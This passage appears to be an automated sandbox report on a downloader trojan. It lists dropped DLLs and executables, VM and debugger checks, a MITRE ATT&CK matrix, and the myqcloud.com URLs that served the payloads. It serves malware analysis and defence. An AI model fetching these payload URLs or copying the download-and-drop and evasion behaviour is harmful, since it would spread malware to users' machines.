Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: LisectAVT_2403002B_78.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: LisectAVT_2403002B_78.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: LisectAVT_2403002B_78.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: LisectAVT_2403002B_78.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: LisectAVT_2403002B_78.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: LisectAVT_2403002B_78.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: LisectAVT_2403002B_78.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: LisectAVT_2403002B_78.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: d:\build\ob\bora-21772623\cayman_glib\glib\src\build\win32\vs14\Release\Win32\bin\gthread-2.0.pdb source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514743145.00000000009D9000.00000004.00000020.00020000.00000000.sdmp, libcurl[1].dll.0.dr, libcurl.dll.0.dr
Source:	Binary string: C:\Users\Administrator\Documents\Project2\Project2\Release\Project2.pdb source: libcurl[1].dll.0.dr, libcurl.dll.0.dr
Source:	Binary string: msvcr120.i386.pdb source: msvcr120[1].dll.0.dr, msvcr120.dll.0.dr
Source:	Binary string: msvcp120.i386.pdb source: msvcp120.dll.0.dr, msvcp120[1].dll.0.dr
Source:	Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdbGCTL source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: I:\build\trunk_cn_9.0build\simulator\bin\dnmultiplayerex.pdb source: QT2[1].exe.0.dr, software.exe.0.dr
Source:	Binary string: wab.pdbGCTL source: LisectAVT_2403002B_78.exe
Source:	Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: wab.pdb source: LisectAVT_2403002B_78.exe

Source: LisectAVT_2403002B_78.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: LisectAVT_2403002B_78.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: LisectAVT_2403002B_78.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: LisectAVT_2403002B_78.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: LisectAVT_2403002B_78.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: msvcp140.dll.0.dr

Static PE information: 0x771734A7 [Mon Apr 25 02:38:31 2033 UTC]

Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe

Code function: 0_2_00AAA223 push ecx; ret

0_2_00AAA236

Source: msvcr120[1].dll.0.dr	Static PE information: section name: .text entropy: 6.95576372950548
Source: msvcr120.dll.0.dr	Static PE information: section name: .text entropy: 6.95576372950548

Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\libcurl[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp120[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	File created: C:\Program Files (x86)\Mysoftwaref\cximagecrt.dll	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\cximagecrt[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	File created: C:\Program Files (x86)\Mysoftwaref\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	File created: C:\Program Files (x86)\Mysoftwaref\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	File created: C:\Program Files (x86)\Mysoftwaref\libcurl.dll	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcr120[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	File created: C:\Program Files (x86)\Mysoftwaref\software.exe	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\QT2[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	File created: C:\Program Files (x86)\Mysoftwaref\msvcp120.dll	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	File created: C:\Program Files (x86)\Mysoftwaref\msvcr120.dll	Jump to dropped file

Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\libcurl[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp120[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Mysoftwaref\cximagecrt.dll	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\cximagecrt[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Mysoftwaref\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Mysoftwaref\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Mysoftwaref\libcurl.dll	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcr120[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Mysoftwaref\software.exe	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\QT2[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Mysoftwaref\msvcr120.dll	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Mysoftwaref\msvcp120.dll	Jump to dropped file

Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe

Code function: 0_2_00ABDEF1 FindFirstFileExW,

0_2_00ABDEF1

Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe

Code function: 0_2_00AA2EC0 GetSystemInfo,CreateDirectoryA,task,task,task,task,task,task,task,task,task,task,task,task,task,task,

0_2_00AA2EC0

Source: Amcache.hve.8.dr	Binary or memory string: VMware
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.8.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.8.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.8.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.8.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.8.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.8.dr	Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2322734496.000000000097C000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842779785.000000000097C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.8.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: libcurl.dll.0.dr	Binary or memory string: VMware, Inc.1
Source: libcurl.dll.0.dr	Binary or memory string: VMware, Inc.0
Source: Amcache.hve.8.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: LisectAVT_2403002B_78.exe, 00000000.00000002.2842779785.000000000090E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`
Source: Amcache.hve.8.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.8.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.8.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.8.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.8.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.8.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.8.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.8.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.8.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.8.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.8.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.8.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.8.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: libcurl.dll.0.dr	Binary or memory string: noreply@vmware.com
Source: Amcache.hve.8.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe

Code function: 0_2_00AB10E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00AB10E1

Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe

Code function: 0_2_00AC17D8 GetProcessHeap,

0_2_00AC17D8

Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Code function: 0_2_00AB10E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00AB10E1
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Code function: 0_2_00AAA4D7 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00AAA4D7
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Code function: 0_2_00AAA63A SetUnhandledExceptionFilter,	0_2_00AAA63A
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Code function: 0_2_00AAA922 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00AAA922

Source: QT2[1].exe.0.dr, software.exe.0.dr

Binary or memory string: .lnkresolveShortcutFromFile buffer is too smallutility::usystem::resolveShortcutFromFilenot traywndShell_TrayWndit is pcutility::usystem::getSystBarHeightit is notebookutility::usystem::isNoteBookPCutility::usystem::isNoteBookPCrunasshell filename = [%s], param = [%s], runas = %d, show = %dutility::process::shellshellEx ret . lastError = %dopenshellEx failed!!! lastError = %dutility::process::shellrunasshellEx filename = [%s], param = [%s], runas = %d, show = %d, timeout = %dutility::process::shellutility::process::shellExutility::process::shellExshellEx failed!!! lastError = %dutility::process::shellExshellEx exitcode = %d lastError = %dutility::process::shellExshellEx timeout!!!utility::process::shellExutility::process::executeshellEx failed!!! lastError = %dutility::process::executeexecute failed!!! last error = %dutility::process::executeexecute exitcode = %d lastError = %dexecute timeout!!!utility::process::executeexecute failed!!! lastError = %dutility::process::executeexecute failed!!! last error = %dutility::process::executeexecute exitcode = %d lastError = %dutility::process::executeexecute timeout!!!utility::process::executeexecute failed!!!""execute process %s utility::process::executeForBatFileexecute signaled. lastError = %dexecute timeout!!!utility::process::executeForBatFileexecute failed!!! lastError = %dutility::process::executeForBatFileexecute process endutility::process::executeForBatFileutility::process::executeForBatFileexecute process error. lastError = %dutility::process::executeForBatFilecreateProcess filename = [%s], param = [%s], show = %d"utility::process::create "utility::process::createutility::process::kill32createProcess failed!!! lastError = %dkill32 h is null pid = %d error = %dutility::process::kill32kill32 progress failed pid = %d lasterror = %dutility::process::killempty enum progress lasterror = %dutility::process::killnot find progress name = %s, pid = %dutility::EnableDebugPriv

Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe

Code function: 0_2_00AAA745 cpuid

0_2_00AAA745

Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_00AC1023
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Code function: GetLocaleInfoW,	0_2_00AC1276
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00AC139F
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Code function: GetLocaleInfoW,	0_2_00AC14A5
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_00AC157B
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Code function: EnumSystemLocalesW,	0_2_00AB79B9
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_00AC0C06
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Code function: EnumSystemLocalesW,	0_2_00AC0EB2
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Code function: GetLocaleInfoW,	0_2_00AB7EE5
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Code function: EnumSystemLocalesW,	0_2_00AC0EFD
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Code function: EnumSystemLocalesW,	0_2_00AC0F98

Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe

Code function: 0_2_00AAA3C7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00AAA3C7

Source: Amcache.hve.8.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	2 Process Injection	2 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Query Registry	Remote Desktop Protocol	Data from Removable Media	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	2 Process Injection	Security Account Manager	41 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	23 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
LisectAVT_2403002B_78.exe	100%	Avira	TR/Dldr.Agent.yrbfh
LisectAVT_2403002B_78.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://upx.sf.net	0%	URL Reputation	safe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp120.dllR	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp120.dlluR	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/vcruntime140.d	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/QT2.exeL	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/Dp	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/cximagecrt.dll9RB	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/Dq	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcr120.dll	0%	Avira URL Cloud	safe
https://www80-1323570959.cos.ap-singapore.myqcloud.com/libcurl.dll	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp120.dll	0%	Avira URL Cloud	safe
https://www80-1323570959.cos.ap-singapore.myqcloud.com/libcurl.dlldll	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/4p	0%	Avira URL Cloud	safe
https://HTTP/1.1	0%	Avira URL Cloud	safe
https://www80-1323570959.cos.ap-singapore.myqcloud.com/&#_	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/	0%	Avira URL Cloud	safe
https://www80-1323570959.cos.ap-singapore.myqcloud.com/libcurl.dlldllTCh	0%	Avira URL Cloud	safe
